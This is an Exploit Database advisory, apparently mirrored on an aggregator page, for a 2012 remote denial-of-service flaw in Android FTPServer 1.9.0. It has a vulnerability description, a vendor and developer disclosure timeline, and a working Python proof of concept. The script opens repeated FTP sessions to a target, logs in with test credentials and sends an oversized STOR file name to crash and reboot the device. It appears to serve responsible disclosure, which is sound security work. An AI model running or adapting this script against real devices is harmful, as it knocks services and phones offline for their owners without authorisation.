Android FTPServer 1.9.0 – Remote Denial of Service

• Exploit Database
• 11 阅读

• 作者： G13
  日期： 2012-03-20
• 类别：

  • dos
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/18630/

• # Exploit Title: Android FTPServer 1.9.0 Remote DoS
  # Date: 03/20/12
  # Author: G13
  # Twitter: @g13net
  # Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
  # Download Link: http://www.g13net.com/ftpserver.apk
  # Version: 1.9.0
  # Category: DoS (android)
  #
  
  ##### Vulnerability #####
  
  FTPServer is vulnerable to a DoS condition when long file names are
  repeatedly attempted to be written via the STOR command.
  
  Successful exploitation will causes devices to restart.
  
  Android Security Team has confirmed this issue.
  
  I have been able to test this exploit against Android 2.2 and 2.3.
  4.0 (ICS) appears not to be vulnerable.
  
  ##### Vendor Timeline #####
  
  Android Security Team:
  10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
  be looking into the issue
  10/21/11 - vendor Requests bug report from device, bug report sent, PoC
  Code Delivered to Vendor
  10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
  on multiple devices
  10/25/11 - Vendor states they are still working on it
  10/30/11 - Current Status asked
  10/31/11 - vendor Replies no updates
  11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
  submit more details
  11/8/11 - Vendor acknowledges that it is not the APK itself causing the
  crashes.Vendor also confirms full reboots from PoC code.
  11/9/11 - Vendor asks if I am just crashing application or device in
  certain instances.I state device is restarting.
  11/11/11 - I ask if there is anything more I may assist with.Vendor
  states they have isolated the impacted component and are working on a
  fix.
  11/18/11 - Current status Asked.
  12/8/11 - Update requested, response that they will contact Kernel team for
  an update
  01/13/12 - Current status asked, no response
  03/06/12 - Current status asked, no response
  03/20/12 - Disclosure
  
  Developer:
  1/24/12 - Developer contacted
  1/25/12 - Developer Responds
  1/27/12 - Supplied Developer with PoC code, Developer confirms issue
  1/29/12 - Developer releases new version
  3/20/12 - Disclosure
  
  ##### PoC #####
  
  #!/usr/bin/python
  # Android FTPServer PoC Device Crash
  
  import socket
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  
  buffer = "STOR " + "A" * 5000 + "\r\n"
  for x in xrange(1,31):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   print x
   s.connect(('172.16.30.108',2121))
  
   data=s.recv(1024)
   s.send("USER test\r\n")
   data=s.recv(1024)
   s.send("PASS test\r\n")
  
   s.send(buffer)
  
   s.send("QUIT")
  
   s.close()